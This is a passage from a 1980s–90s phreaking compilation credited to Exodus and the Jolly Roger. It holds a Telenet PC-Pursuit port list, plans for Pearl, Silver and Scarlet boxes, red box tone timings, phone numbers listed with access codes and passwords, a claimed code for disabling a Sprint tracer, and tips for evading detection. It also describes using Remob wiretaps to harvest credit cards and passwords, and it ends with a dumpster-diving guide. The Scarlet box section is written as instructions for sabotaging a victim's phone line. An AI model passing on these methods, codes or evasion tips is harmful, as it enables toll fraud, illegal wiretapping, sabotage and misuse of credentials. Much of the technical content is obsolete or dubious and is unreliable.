COMBINATIONS SET UP IN THE TALKING PATH. [THIS IS THE OFFICIAL REASONING].
OUT OF BAND SIGNALLING TECHNIQUES PLACED THE INTEROFFICE DATA IN SPECIAL
CHANNELS,GENERALLY
ADJACENT TO AND IMMEDIATELY ABOVE THE VOICE PATH.TO PRE-
SERVE INTERCHANNEL INTEGRITY,OUT OF BAND
SIGNALLING REQUIRES VERY EFFECIENT
FILTERING OR GREATER 'BAND GUARD' SEPERATION BETWEEN CHANNELS.
Brought to
you in the Cookbook IV courtesy of Exodus!!!!!!!!!!!!
Index
PC-Pursuit Port Statistic's
Date: 06/29/89
Written by: PC-Pursuit Users
Introduction:
The last 30 days of PC-Pursuit have been extremely controversial. Users
and ex-users have demanded
accurate statistics, and Telenet has provided us
with very little. And the data that was provided is
questionable. Well, here
is some data that is guaranteed to be accurate and make Telenet scream. If
you wish to update this data on your own, we will tell you how later in this
text.
The following chart consists of all the direct Telenet addresses
of the PC-Pursuit city nodes and the
total number of modems on each node.
Here is what the data means:
NJNEW/3 2011 .12 56
! ! ! ! \-- Total
Number of Modems in NJNEW
! ! ! \- Last Working Suffix of Address sequence.
! ! \- Direct Telenet Address Prefix.
! \--- Baud Rate of This Port is
300.
\--------- Mnemonic.
Please note that there are several
perfectly legal ways to connect to a PC-Pursuit port such as
NJNEW/3: Ways
To Connect to NJNEW/3:
1. C D/NJNEW/3,PCP10000, [HUNT]
2. C
2011,PCP10000, [HUNT]
3. C 2011.10,PCP10000, [NON HUNT]
The first, is self explanatory. The second does the same thing as the
first, only that it is slightly
faster and gives the user much greater
flexibility. The third is an example the flexibility, because a
request is
made to connect to the tenth, and only the tenth, modem on the NJNEW/3 port.
By simply attempting to connect to every single modem in the 2011 chain,
we were able to count the
number of modems on each port and come up with the
following charts which were extracted on June the
twenty ninth of the year
1989:
Rotary Direct Max. City Rotary Direct Max. City
Port Address Range
Total Port Address Range Total
-------- ------- --- ----- -------- -------
--- -----
NJNEW/3 2011 .12 56 CAOAK/3 4155 . 4 16
/12 201301 .40 /12
415216 . 8
/24 20122 . 4 /24 41511 . 4
DCWAS/3 202115 . 6 46 CAPAL/3
415106 . 4 12
/12 202116 .24 /12 415224 . 8
/24 202117 .16 /24
CTHAR/3 8 CASFA/3 415215 . 6 20
/12 203120 . 8
/12 415217 .10
/24 /24 41523 . 4
WASEA/3 20617 . 4 30
ORPOR/3 50320 . 2 8
/12 20619 .22 /12 50321 . 6
/24 20621 . 4 /24
NYNYO/3 212315 . 4 22 AZPHO/3 60222 . 4 20
/12 212316 .14
/12 60223 .12
/24 21228 . 4 /24 60226 . 4
CALAN/3 213412 . 8 40 MNMIN/3
612120 . 4 22
/12 213413 .28 /12 612121 .14
/24 21323 . 4 /24 61222 . 4
TXDAL/3 214117 . 6 30 MABOS/3 617311 . 4 32
/12 214118 .22 /12 617313
.20
/24 21422 . 4 /24 61726 . 8
PAPHI/3 215112 . 6 36 TXHOU/3 713113 . 8
42
/12 2155 .22 /12 713114 .24
/24 21522 . 8 /24 71324 .10
OHCLE/3
21620 . 4 26 CACOL/3 71423 . 4 18
/12 21621 .18 /12 7144 .10
/24 216120
. 4 /24 71424 . 4
CODEN/3 303114 . 4 40 CASAN/3 714119 . 4 20
/12 303115
.18 /12 714213 .12
/24 30321 .22 /24 714124 . 4
FLMIA/3 305120 . 6 28
CASDI/3 714102 . 4 22
/12 305121 .18 (619)/12 714210 .14
/24 305122 . 4
/24 714121 . 4
ILCHI/3 312410 . 8 40 UTSLC/3 80120 . 4 22
/12 312411 .28
/12 80121 .14
/24 31224 . 4 /24 80112 . 4
MIDET/3 313214 . 6 30 FLTAM/3
81320 . 4 18
/12 313216 .18 /12 81321 .10
/24 31324 . 6 /24 813124 . 4
MOSLO/3 3145 . 4 16 MOKCI/3 816104 . 4 20
/12 314421 . 8 /12 816221 .12
/24 31420 . 4 /24 816113 . 4
GAATL/3 404113 . 8 32 CAGLE/3 ??
/12
404114 .20 /12 81821 .18
/24 40422 . 4 /24
CASJO/3 408111 . 4 34 CASAC/3
9167 . 4 16
/12 40821 .26 /12 91611 . 8
/24 408110 . 4 /24 91612 . 4
WIMIL/3 41420 . 4 24 NCRTP/3 91920 . 4 20
/12 41421 .16 /12 91921 .12
/24 414120 . 4 /24 919124 . 4
01/29/89 PC-Pursuit Modems Statistics
Chart
Number of Modems City
Mnemonic 300 1200 2400 Total
----------
-------- --------- --------- ---------
NJNEW 12 40 4 56
DCWAS 6 24 16 46
CTHAR 0 8 0 8
WASEA 4 22 4 30
NYNYO 4 14 4 22
CALAN 8 28 4 40
TXDAL 6 22 4 32
PAPHI 6 22 8 36
OHCLE 4 18 4 26
CODEN 4 18 22 44
FLMIA 6 18 4 28
ILCHI 8 28 4 40
MIDET 6 18 6 30
MOSLO 4 8 4 16
GAATL 8 20 4 32
CASJO 4 26 4 34
WIMIL 4 16 4 24
CAOAK 4 8 4 16
CAPAL 4 8 0 12
CASFA 6 10 4 20
ORPOR 2 6 0 8
AZPHO 4 12 4 20
MNMIN 4 14 4 22
MABOS 4 20 8 32
TXHOU 8 24 10 42
CACOL 4 10 4 18
CASAN 4 12 4 20
CASDI 4 14 4 22
UTSLC 4 14 4 22
FLTAM 4 10 4 18
MOKCI 4 12 4 20
CAGLE 4 18 4 26
CASAC 4 8 4 16
NCRTP 4 12 4 20
-------- --------- --------- ---------
Total 166 562 170 898
======== ========= ========= =========
Average 4.8823529 16.529412 5
26.411765
NOTE: CASAC/3, CASAC/24 were estimated.
I think the
statistics basically speak for themselves. I am sure there will no doubt be
hundreds of
people who will not smile at the number of specific kinds of
ports supported, not to mention the
number of 'dead' or 'down' modems you
will find when you verify the totals. Usually, 2% to perhaps 10%
of the
modems are 'dead' with specific ones repeatedly failing week after week.
History Of This Collection:
Almost a year ago a small selected
group of devoted individuals got together to discuss problems with
the PC-
Pursuit Network, in the middle of our discussions a question was asked as to how
the network
really processes our calls. This was intended to help us assess
SET? commands and other such matters.
When the address hypothesis was
offered we quickly set out to prove it. It was proved in about 3
minutes
with the discovery of 2011 (First try was xxx1). The data has continually been
collected and
analyzed ever since, but until now, has never been mass
released.
A small group of teen age hackers discovered several
interesting things that can be done with these
addresses-- many of which
will not be discussed here short of mentioning that these ports connected to
via these addresses are not limited to PC-Pursuiters. You can, however,
fight "dead" dialout modems in
cities via the address method. Dead modems
can be located in about 10 seconds (faster than Telenet),
and can either be
reported or skipped past by the user connecting to the next modem in the
sequence
after the "dead" one. (Note: Say 2011.3 is dead, connect to 2011.4
and you will be past it. If 2011.4
is busy, go to 2011.5. The reader should
notice 2011.3 is the same as 2011C.)
The most interesting value of these
addresses is that one can count the number of ports that Telenet
keeps so
secret (Grin). When there were only 28 cities in operation there were an average
of 2.7 300
baud, 9.4 1200 baud, and 2.5 2400 baud modems in each city. Some
cities had as little as 2 modems on a
port and as many as 12. Only recently
has the number of modems per city begun to jump.
How To Update The Count
Yourself:
An ID is not required to "request" one of these ports, thus
the tallying can be done any time of day
by simply typing the number at the
@ prompt. Here is an example with four modems (NJNEW/24):
@20122.1
201
22A REFUSED COLLECT CONNECTION 19 80
@20122.2
201 22B REFUSED COLLECT
CONNECTION 19 80
@20122.3
201 22C REFUSED COLLECT CONNECTION 19 80
@20122.4
201 22D REFUSED COLLECT CONNECTION 19 80
@20122.5
201
22E ILLEGAL ADDRESS 19 80
The reader should be aware that PC-Pursuit
ports always respond with '19 80'. Do not confuse it with
'19 00', which are
not PC-Pursuit ports. In the above example we know there are four ports because
the
forth was the last existing port before we encountered the 'ILLEGAL
ADDRESS.' There are several ways
to signify that you have gone one beyond
the end of the ports:
1. xxx xxx ILLEGAL ADDRESS 19 80
2. xxx xxx NOT
OPERATING 19 80
3. The request freezes (Note: Issue a BREAK then D to
abort the attempt yielding 'ATTEMPT
ABORTED'.) You should be aware that
modems which are out of order in the middle of the sequence
can respond with
'NOT OPERATING' or may freeze the request. You should also note that when
updating the existing list, all you need to do is try to request the next
modem beyond the end as
of the last check.
Finding Newly Added Ports:
Many ports have not yet been installed; hence, we do not yet know the
addresses. New ports may be
found by entering the first three digits of the
area code and appending (1-29, 101-129, 201-229,
301-329, etc.) until the
'REFUSED COLLECT CONNECTION 19 80' appears. Once this is found, simply
log
onto the port address with your ID and R/V dial some silly series of digits,
disconnect the
port, then connect to the PC-Pursuit mnemonic you think it
might be and R/V redial the last
number. If the numbers match, you found it.
Index
Pearl Box Plans by the Jolly Roger
The Pearl Box:Definition - This is a box that may substitute for many
boxes which produce tones in
hertz. The Pearl Box when operated correctly
can produce tones from 1-9999hz. As you can see, 2600,
1633, 1336 and other
crucial tones are obviously in its sound spectrum.
Materials you will
need in order to build The Pearl Box:
C1, C2:.5mf or .5uf ceramic disk
capacitors
Q1.....NPN transistor (2N2222 works
best)
S1.....Normally open momentary SPST
switch
S2.....SPST toggle switch
B1.....Standard 9-Volt battery
R1.....Single turn, 50k potentiometer
R2..... " " 100k potentiometer
R3..... " " 500k potentiometer
R4..... " " 1meg potentiometer
SPKR...Standard 8-ohm speaker
T1.....Mini transformer (8-ohm works
best)
Misc...Wire, solder,
soldering iron, PC
board or perfboard, box to
contain the completed
unit,
battery clip
Instructions for building Pearl Box: Since the
instruction are EXTREMELY difficult to explain in
words, you will be given a
schematic instead. It will be quite difficult to follow but try it any way.
(Schematic for The Pearl Box)
+---+------------+---------+
! ! \
C1 C2 \
! ! +
+ + -----+T1
!\ +------------+-+
! b c-------!
+
! Q1 ! +-S1-
! e-----S2---+ ! SPKR
! ! ! +----
! B1 !
! !
!
! +-------+
!R1 R2 R3 R4!
/\/\ /\/\ /\/\ /\/\
+--+ +--+ +--+
Now that you are probably thoroughly confused, let me explain a few
minor details. The potentiometer
area is rigged so that the left pole is
connected to the center pole of the potentiometer next to it.
The middle
terminal of T1 is connected to the piece of wire that runs down to the end of
the battery.
Correct operation of The Pearl Box:
You may want to
get some dry-transfer decals at Radio Shack to make this job a lot easier. Also,
some
knobs for the tops of the potentiometers may be useful too. Use the
decals to calibrate the knobs. R1
is the knob for the ones place, R2 is for
the tens place, R3 if for the hundreds place and R4 is for
the thousands
place. S1 is for producing the all the tones and S2 is for power.
1. Turn on
the power and adjust the knobs for the desired tone. (Example: For 2600 hz-
R1=0:R2=0:R3=6:R4=2)
2. Hit the pushbutton switch and VIOLA! You have
the tone. If you don't have a tone recheck all
connections and schematic.
Exodus
Index
The Phreak file courtesy of the Jolly Roger
202 282 3010 UNIV. OF D.C.
202 553 0229 PENTAGON T.A.C.
202 635
5710 CATHOLIC UNIV. OF AMERICA
202 893 0330 DEFENSE DATA NETWORK
202 893
0331 DEFENSE DATA NETWORK
202 965 2900 WATERGATE
203 771 4930 TELEPHONE
PIONEERS
206 641 2381 VOICE OF CHESTER
212 526 1111 NEW YORK FEED LINE
212 557 4455 SEX HOT LINE
212 799 5017 ABC NY FEED LINE
212 934 9090
DIAL-AN-IDIOT
212 976 2727 P.D.A.
212 986 1660 STOCK QUOTES
213 541
2462 STOCK MARKET REPORTS
213 547 6801 NAVY SHIPS INFO
213 576 6061 " "
213 664 3321 NEWS FOR THE BLIND
301 393 1000 " "
301 667 4280
LOTTERY INFO
312 939 1600 " "
404 221 5519 NUCLEAR COMMISSION
408
248 8818 1ST NAT'L BANK
415 642 2160 EARTHQUAKE REPCRT
505 883 6828 " "
512 472 2181 " "
512 472 4263 WIERD RECORDING
512 472 9833 " "
512 472 9941 INSERT 25 CENTS
512 472 9941 SPECIAL RECORDING
512 870
2345 " "
516 794 1707 " "
619 748 0002 LOOP LINE
619 748 0003 " "
703 331 0057 MCI (5 DIGITS)
703 334 6831 WASH. POST
703 354 8723
COMPEL INC.
703 737 2051 METROPHONE (6 DIGITS)
703 835 0500 VALNET (5
DIGITS)
703 861 7000 SPRINT (6/8 DIGITS)
703 861 9181 SPRINT (6/8
DIGITS)
714 974 4020 CA. MAINFRAME
716 475 1072 N.Y. DEC-SYSTEM
800
222 0555 RESEARCH INSTITUTE
800 223 3312 CITIBANK
800 227 5576 EASTERN
AIRLINES
800 248 0151 WHITE HOUSE PRESS
800 321 1424 FLIGHT PLANES
800 323 3026 TEL-TEC (6 GIGITS)
800 323 4756 MOTOROLA DITELL
800 323
7751 M.C.I. MAINFRAME
800 325 4112 EAsYLINK
800 325 6397 F.Y.I.
800
344 4000 MSG SYSTEM
800 368 6900 SKYLINE ORDER LINE
800 424 9090 RONALD
REAGAN'S PRESS
800 424 9096 WHITE HOUSE SWITCH
800 438 9428 ITT CITY
CALL SWITCHING
800 521 2255 AUTONET
800 521 8400 TRAVELNET (8 DIGITS)
800 526 3714 RCA MAINFRAME
800 527 1800 TYMNET
800 621 3026 SPECIAL
OPERATOR
800 621 3028 " "
800 621 3030 " "
800 621 3035 " "
800
631 1146 VOICE STAT
800 821 2121 BELL TELEMARKETING
800 828 6321 XEROX $
800 858 9313 RECORD-A-VOICE
800 882 1061 AT&T STOCK PRICES
914
997 1277 " "
916 445 2864 JERRY BROWN
N/A 950 1000 SPRINT
N/A 950
1022 MCI EXECUNET
N/A 950 1033 US TELEPHONE
N/A 950 1044 ALLNET (6
DIGITS)
N/A 950 1066 LEXITEL
N/A 950 1088 SKYLINE (6 DIGITS)
-----------------------------------
PHONE # | DESCRIPTION/CODE
-----------------------------------
201-643-2227 | CODES:235199,235022
| AND 121270
|
800-325-4112 | WESTERN UNION
|
800-547-1784 |
CODES:101111,350009
| AND 350008
|
800-424-9098 | TOLL FREE WHITE
HS.
|
800-424-9099 | DEFENSE HOT LINE
|
202-965-2900 | WATERGATE
|
800-368-5693 | HOWARD BAKER HOTLN
|
202-456-7639 | REAGANS
SECRETARY
|
202-545-6706 | PENTAGON
|
202-694-0004 | PENTAGON
MODEM
|
201-932-3371 | RUTGERS
|
800-325-2091 | PASSWORD: GAMES
|
800-228-1111 | AMERICAN EXPRESS
|
617-258-8313 | AFTER CONNECT
| PRESS CTRL-C
|
800-323-7751 | PASSWORD:REGISTER
|
800-322-1415 | CODES:266891,411266
| AND 836566
| (USED BY SYSOP)
The following 800 #'s have been collected however no codes have been
found yet! if you hack any please
let me know...
-----------------------------------
phone # | codes:
-----------------------------------
800-321-3344 | ???????????
800-323-3027 | ???????????
800-323-3208 | ???????????
800-323-3209 |
???????????
800-325-7222 | ???????????
800-327-9895 | ???????????
800-327-9136 | ???????????
800-343-1844 | ???????????
800-547-1784 |
???????????
800-547-6754 | ???????????
800-654-8494 | ???????????
800-682-4000 | ???????????
800-858-9000 | ???????????
800 #'s with
carriers.
800-323-9007
800-323-9066
800-323-9073
800-321-4600
800-547-1784
1-800 numbers of the goverment.
800-321-1082:NAVY
FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL
TOBACCO AND.
800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS
SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR
COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL
SHIPYARD.
Directory of toll free numbers.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
203-771-3930:PIONEERS
471-9420,345-9721,836-8962
836-3298,323-4139,836-5698
471-9440,471-9440,471-6952
476-6040,327-9772,471-9480
800-325-1693,800-325-4113
800-521-8400:VOICE ACTIVATED
213-992-8282:METROFONE ACCESS NUMBER
617-738-5051:PIRATE HARBOR
617-720-3600:TIMECOR #2
301-344-9156:N.A.S.A PASSWORD:GASET
318-233-6289:UNIVERSITY LOUISIANA
213-822-2112:213-822-3356
213-822-1924:213-822 3127
213-449-4040:TECH CENTER
213-937-3580:TELENET
1-800-842-8781
1-800-368-5676
1-800-345-3878
212-331-1433
213-892-7211
213-626-2400
713-237-1822
713-224-6098
713-225-1053
713-224-9417
818-992-8282
1-800-521-8400
After entering the sprint code,and,
C+Destination number.Then enter this:
number:"205#977#22",And the main
tracer for sprint will be disabled.
215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE
CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN
TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE
TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW
ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK
TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT
CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE
SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE
Here are a few tips on how not to get
caught when using MCI or other
such services:
* Try not to use them for
voice to voice personal calls. Try to use them for computer calls only.
Here
is why: MCI and those other services can't really trace the calls that come
through the
lines,they can just monitor them. They can listen in on your
calls and from that,they can get your
name and other information from the
conversation. They can also call the number you called and ask
your friend
some questions. If you call terminals and BBS'S then it is much harder to get
information. For one thing,most sysops won't give these dudes that call any
info at all or they
will act dumb because they PHREAK themselves!
*
Beware when using colored boxes! They are easy to find!!!!!
* Try to find a
sine-wave number. Then use an MCI or other service to call it. You will hear a
tone
that goes higher and lower. If the tone just stops,then that code is
being monitored and you
should beware when using it.
If you do get
caught,then if you think you can,try to weasel out of it. I have heard many
stories
about people that have pleaded with the MCI guys and have been let
off. You will get a call from a guy
that has been monitoring you. Act nice.
Act like you know it is now wrong to do this kind of
thing.....just sound
like you are sorry for what you did. (If you get a call,you probably will be a
little sorry!) Otherwise,it is very dangerous!!!!!!! (Very with a capital
V!)
UpDated in '94........ -= Exodus =-
Index
Red Box Plans by the Jolly Roger
Red boxing is simulating the tones produced by public payphones when you
drop your money in. The tones
are beeps of 2200 Hz + 1700 Hz
Nickle = 1
beep for 66 milliseconds.
Dime = 2 beeps, each 66 milliseconds with a 66
millisecond pause between beeps.
Quarter = 5 beeps, each 33 milliseconds
with a 33 millisecond pause between beeps.
There are two commonly used
methods being used by Phreaks to make free calls.
1. An electronic hand-held
device that is made from a pair of Wien-bridge oscillators with the timing
controlled by 555 timing chips.
2. A tape recording of the tones
produced by a home computer. One of the best computers to use would
be an
Atari ST. It is one of the easier computers to use because the red box tones can
be produced
in basic with only about 5 statments.
-= Exodus =-
Index
RemObS by the Jolly Roger
Some of you may have heard of devices called Remobs which stands for
Remote Observation System. These
Devices allow supposedly authorized
telephone employees to dial into them from anywhere, and then
using an
ordinary touch tone fone, tap into a customer's line in a special receive only
mode. [The
mouthpiece circuit is deactivated, allowing totally silent
observation from any fone in the world
(Wire tapping without a court order
is against the law)]
How Remobs Work
Dial the number of a Remob
unit. Bell is rumored to put them in the 555 information exchanges, oron
special access trunks [Unreachable except via blue box]. A tone will then be
heard for approximately 2
seconds and then silence. You must key in (In
DTMF) a 2 to 5 digit access code while holding each
digit down at least 1
second. If the code is not entered within 5 or 6 seconds, the Remob will release
and must be dialed again. If the code is supposedly another tone will be
heard. A seven digit
subscriber fone number can then be entered [The Remob
can only handle certain 'exchanges' which are
prewired, so usually one
machine cannot monitor an entire NPA]. The Remob will then connect to the
subscribers line. The listener will hear the low level idle tone as long as
the monitored party is on
hook. As the monitored party dials [rotary or
DTMF], the listener would hear [And Record] the number
being dialed. Then
the ENTIRE conversation, datalink, whatever is taking place, all without
detection.
There is no current box which can detect Remob observation, since
it is being done with the telephone
equipment that makes the connection.
When the listener is finished monitoring of that particular
customer, he
keys the last digit of the access code to disconnects him from the monitored
line and
return to the tone so that he can key in another 7 digit fone #.
When the listener is totally finished
with the Remob, he keys a single
'disconnect digit' which disconnects him from the Remob so that the
device
can reset and be ready for another caller.
History of Remobs
Bell has kept the existance of Remobs very low key. Only in 1974, Bell
acknowledged that Remobs
existed. The device was first made public during
hearings on "Telephone Monitoring Practices by
Federal Agencies" before a
subcommittee on government operations. House of Representatives,
Ninety-Third Congress, June 1974.
It has since been stated by Bell
that the Remob devices are used exclusively for monitoring Bell
employees
such as operators, information operators, etc., to keep tabs on their
performance.
[Suuureee, were stupid]
Possible Uses for Remobs
The possible uses of Remobs are almost as endless as the uses of self
created fone line. Imagine the
ability to monitor bank lines etc, just off
the top of my head I can think of these applications:
Data Monitoring
of:
* TRW
* National Credit Bureau
* AT&T Cosmos
* Bank
Institutions
* Compuserve and other Networks.
Voice Monitoring of:
* Bank Institutions
* Mail Order buisnesses.
* Bell Telephone
themselves.
* Any place handling sensitive or important information.
*
Anyone that you may not like.
With just one Remob, someone could get
hundreds of credit cards, find out who was on vacation, get
compuserve
passwords by the dozens, disconnect peoples fones, do credit checks, find out
about
anything that they may want to find out about. Im sure you brilliant
can see the value of a telephone
hobbiest and a telecommunications enthusist
getting his hands on a few choice Remobs.
Caution
If any
reader should discover a Remob during his (or her) scanning excursions, please
keep in mind the
very strict federal laws regarding wiretapping and
unauthorized use of private Bell property.
-= Exodus =-
Index
Scarlet Box Plans by the Jolly Roger
The purpose of a Scarlet box is to create a very bad conection, it can
be used to crash a BBS or just
make life miserable for those you seek to
avenge.
Materials:
* 2 alligator clips
* 3 inch wire, or a
resister
(plain wire will create greatest amount of static)
(Resister
will decrease the amount of static in porportion to the resister you are using)
1. Find the phone box at your victims house, and pop the cover off.
2. Find the two prongs that the phone line you wish to box are connected to.
3. Hook your alligator clips to your (wire/resister).
4. Find the lower
middle prong and take off all wires connected to it, i think this disables the
ground and call waiting and shit like that.
5. Now take one of the
alligator clips and attach it to the upper most prong, and take the other and
attach it to the lower middle prong.
6. Now put the cover back on the
box and take off!!
** ######## **
** # #### # **
######## /
# #### # /
######## /
/
/
/
/
/
/
/
**/
**
**
**
**
**
(**)= prongs
**
(/) =
(wire/resister)
(##)= some phone bullshit
-= Exodus =-
Index
Silver Box Plans by the Jolly Roger
Introduction:
First a bit of Phone Trivia. A standard telephone
keypad has 12 buttons. These buttons, when pushed,
produce a combination of
two tones. These tones represent the row and column of the button you are
pushing.
1 1 1
2 3 4
0 3 7
9 6 7
697 (1) (2) (3)
770
(4) (5) (6)
851 (7) (8) (9)
941 (*) (0) (#)
So (1) produces a
tone of 697+1209, (2) produces a tone of 697+1336, etc.
Function:
What the Silver Box does is just creates another column of buttons, with
the new tone of 1633. These
buttons are called A, B, C, and D.
Usefulness:
Anyone who knows anything about phreaking should
know that in the old days of phreaking, phreaks used
hardware to have fun
instead of other people's Sprint and MCI codes. The most famous (and useful) was
the good ol' Blue Box. However, Ma Bell decided to fight back and now most
phone systems have
protections against tone-emitting boxes. This makes
boxing just about futile in most areas of the
United States (ie those areas
with Crossbar or Step-By-Step). If you live in or near a good-sized
city,
then your phone system is probably up-to-date (ESS) and this box (and most
others) will be
useless. However, if you live in the middle of nowhere (no
offense intended), you may find a use for
this and other boxes.
Materials:
* 1 Foot of Blue Wire
* 1 Foot of Grey Wire
*
1 Foot of Brown Wire
* 1 Small SPDT Switch (*)
* 1 Standard Ma Bell
Phone
(*) SPDT = Single Pole/Double Throw
Tools:
* 1
Soldering Iron
* 1 Flat-Tip Screwdriver
Procedure:
1. Loosen
the two screws on the bottom of the phone and take the casinf off.
2. Loosen
the screws on the side of the keypad and remove the keypad from the mounting
bracket.
3. Remove the plastic cover from the keypad.
4. Turn the keypad
so that *0# is facing you. Turn the keypad over. You'll see a bunch of wires,
contacts, two Black Coils, etc.
5. Look at the Coil on the left. It will
have five (5) Solder Contacts facing you. Solder the Grey
Wire to the fourth
Contact Pole from the left.
6. Solder the other end of the Grey Wire to the
Left Pole of the SPDT Switch.
7. Find the Three (3) Gold-Plated Contacts on
the bottom edge of the keypad. On the Left Contact,
gently seperate the two
touching Connectors (they're soldered together) and spread them apart.
8.
Solder the Brown Wire to the Contact farthest from you, and solder the other end
to the Right Pole
of the SPDT Switch.
9. Solder the Blue Wire to the
Closest Contact, and the other end to the Center Pole of the SPDT
Switch.
10. Put the phone back together.
Using The Silver Box:
What
you have just done was installed a switch that will change the 369# column into
an ABCD column.
For example, to dial a 'B', switch to Silver Box Tones and
hit '6'.
Noone is sure of the A, B, and C uses. However, in an area with
an old phone system, the 'D' button
has an interesting effect. Dial
Directory Assistance and hold down 'D'. The phone will ring, and you
should
get a pulsing tone. If you get a pissed-off operator, you have a newer phone
system with
defenses against Silver Boxes. At the pulsing tone, dial a 6 or
7. These are loop ends.
-= Exodus =-
Index
Bell Trashing by the Jolly Roger
The Phone Co. will go to extreams on occasions. In fact, unless you
really know what to expect from
them, they will suprise the heck out of you
with their "unpublished tarriffs". Recently, a situation
was brought to my
attention that up till then I had been totaly unaware of, least to mention, had
any
concern about. It involved gar- bage! The phone co. will go as far as to
prosecute anyone who rumages
through their garbage and helps himself to some
Of course, they have their reasons for this, and no doubt benefit from
such action. But, why should
they be so picky about garbage? The answer soon
became clear to me: those huge metal bins are filled
up with more than waste
old food and refuse... Although it is Pacific Tele. policy to recycle paper
waste products, sometimes employees do overlook this sacred operation when
sorting the garbage. Thus
top-secret confidential Phone Co. records go to
the garbage bins instead of the paper shredders. Since
it is constantly
being updated with "company memorandums, and supplied with extensive reference
material, the Phone co. must continualy dispose of the outdated materials.
Some phone companies are
supplied each year with the complete "System
Practices" guide. This publication is an over 40 foot
long library of
reference material about everything to do with telephones. As the new edition
arrives
each year, the old version of "System Practices" must also be thrown
out.
I very quickly figured out where some local phone phreaks were
getting their material. They crawl into
the garbage bins and remove selected
items that are of particular interest to them and their fellow
phreaks. One
phone phreak in the Los Angeles area has salvaged the complete 1972 edition of
"Bell
System Practices". It is so large and was out of order (the binders
had been removed) that it took him
over a year to sort it out and create
enough shelving for it in his garage.
Much of this "Top Secret"
information is so secret that most phone companies have no idea what is in
their files. They have their hands full simply replacing everything each
time a change in wording
requires a new revision. It seems they waste more
paper than they can read!
It took quite a while for Hollywood Cal
traffic manager to figure out how all of the local phone
phreaks constantly
discovered the switchroom test numbers
Whenever someone wanted to use
the testboard, they found the local phone phreaks on the lines talking
to
all points all over the world. It got to the point where the local garbage buffs
knew more about
the office operations than the employees themselves. One
phreak went so far as to call in and tell a
switchman what his next daily
assignment would be. This, however, proved to be too much. The switchman
traced the call and one phone phreak was denied the tool of his trade.
In another rather humorous incident, a fellow phreak was rumaging
through the trash bin when he heard
somone apraoching. He pressed up against
the side of the bin and silently waited for the goodies to
come. You can
imagine his surprise when the garbage from the lunchroom landed on his head.
Most people
find evenings best for checking out their local telco trash
piles. The only thing necessary is a
flashlight and, in the case mentioned
above, possibly a rain coat. A word of warning though, before
you rush out
and dive into the trash heap. It is probably illegal, but no matter where you
live, you
certainly won't get the local policeman to hold your flashlight
for you.
-= Exodus =-
Index
Canadian WATS Phonebook courtesy of the Jolly Roger
